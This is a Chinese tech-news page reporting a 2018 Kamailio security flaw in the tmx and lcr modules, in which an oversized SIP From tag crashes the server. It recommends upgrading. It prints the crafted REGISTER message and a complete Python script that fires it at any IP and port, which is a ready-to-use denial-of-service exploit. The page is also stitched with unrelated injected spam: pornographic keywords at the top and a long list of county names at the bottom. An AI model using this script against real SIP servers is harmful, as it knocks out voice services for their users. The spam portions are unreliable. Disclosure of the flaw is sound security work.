中文字幕在线视频第一页,黄色毛片在线看,日本爱爱网站,亚洲系列中文字幕一区二区

您當(dāng)前的位置是:  首頁(yè) > 新聞 > 國(guó)內(nèi) >
 首頁(yè) > 新聞 > 國(guó)內(nèi) >

爆kamailio 安全問(wèn)題影響tmx和lcr module模塊

2018-03-21 11:08:59   作者:james.zhu   來(lái)源:Asterisk開(kāi)源派   評(píng)論:0  點(diǎn)擊:


  kamailio 版本4.4.5.0 和5.1模塊爆安全問(wèn)題,tmx模塊和lcr模塊可能收到影響。攻擊者可根據(jù)模塊漏洞通過(guò)tag 方式使用非法的branch或from tag對(duì)kamailio進(jìn)行攻擊,可導(dǎo)致kamalio崩潰。tmx 模塊負(fù)責(zé)對(duì)transaction management 進(jìn)行管理,LCR則負(fù)責(zé)是一個(gè)最低資費(fèi)路由模塊。如果用戶沒(méi)有使用以上兩個(gè)模塊,則無(wú)影響,如果使用了以上兩個(gè)模塊,官方建議盡快升級(jí)到最新版本。
  以下是通過(guò)SIP tag 攻擊kamailio導(dǎo)致軟交換崩潰的消息:
  • REGISTER sip:localhost:5060 SIP/2.0
  • Via: SIP/2.0/TCP 127.0.0.1:53497;branch=z9hG4bK0aa9ae17-25cb-4c3a-abc9-979ce5bee394
  • To: <sip:1@localhost:5060>
  • From: Test <sip:2@localhost:5060>;tag=bk1RdYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaRg
  • Call-ID: 8b113457-c6a6-456a-be68-606686d93c38
  • Contact: sip:1@127.0.0.1:53497
  • Max-Forwards: 70
  • CSeq: 10086 REGISTER
  • User-Agent: go SIP fuzzer/1
  • Content-Length: 0
  使用的Python 代碼攻擊方式如下,
  python crash.py <ip> <port>
  #!/usr/bin/env python
  import socket
  import sys
  PROTO = "udp"
  SERVER_IP = "127.0.0.1"
  SERVER_PORT = 5060
  for _ in range(2):
  • sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  • sock.connect((sys.argv[1], int(sys.argv[2])))
  • msg = "REGISTER sip:localhost:5060 SIP/2.0\r\n" \
  • "Via: SIP/2.0/TCP 127.0.0.1:53497;branch=z9hG4bK0aa9ae17-25cb-4c3a-abc9-979ce5bee394\r\n" \
  • "To: <sip:1@localhost:5060>\r\n" \
  • "From: Test <sip:2@localhost:5060>;tag=bk1RdYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaRg\r\n" \
  • "Call-ID: 8b113457-c6a6-456a-be68-606686d93c38\r\n" \
  • "Contact: sip:1@127.0.0.1:53497\r\n" \
  • "Max-Forwards: 70\r\n" \
  • "CSeq: 10086 REGISTER\r\n" \
  • "User-Agent: go SIP fuzzer/1\r\n" \
  • "Content-Length: 0\r\n" \
  • "\r\n"
  sock.sendall(msg)
  具體補(bǔ)防漏洞的方式主要通過(guò)對(duì) R-URI的字符串長(zhǎng)度進(jìn)行檢查。
  請(qǐng)查看官方網(wǎng)站的cfg配置:
  https://www.kamailio.org/w/2018/03/kamailio-security-announcement-tmx-lcr/
  關(guān)注微信公眾號(hào):asterisk-cn,獲得有價(jià)值的行業(yè)分享
  開(kāi)源IPPBX論壇:www.ippbx.org.cn
  Asterisk, freepbx技術(shù)文檔: www.freepbx.org.cn
  融合通信商業(yè)解決方案首選產(chǎn)品:www.hiastar.com
【免責(zé)聲明】本文僅代表作者本人觀點(diǎn),與CTI論壇無(wú)關(guān)。CTI論壇對(duì)文中陳述、觀點(diǎn)判斷保持中立,不對(duì)所包含內(nèi)容的準(zhǔn)確性、可靠性或完整性提供任何明示或暗示的保證。請(qǐng)讀者僅作參考,并請(qǐng)自行承擔(dān)全部責(zé)任。

專題

五原县| 遂溪县| 邓州市| 于田县| 青龙| 康马县| 宜君县| 修文县| 舞阳县| 翼城县| 平邑县| 大港区| 蒙阴县| 保康县| 隆昌县| 涪陵区| 广水市| 永兴县| 罗山县| 兰州市| 长治市| 平乡县| 炎陵县| 辉县市| 榆树市| 化隆| 福贡县| 武定县| 桦南县| 偏关县| 同德县| 龙南县| 大兴区| 晋州市| 高邮市| 郴州市| 西乡县| 临城县| 桂东县| 建瓯市| 马关县|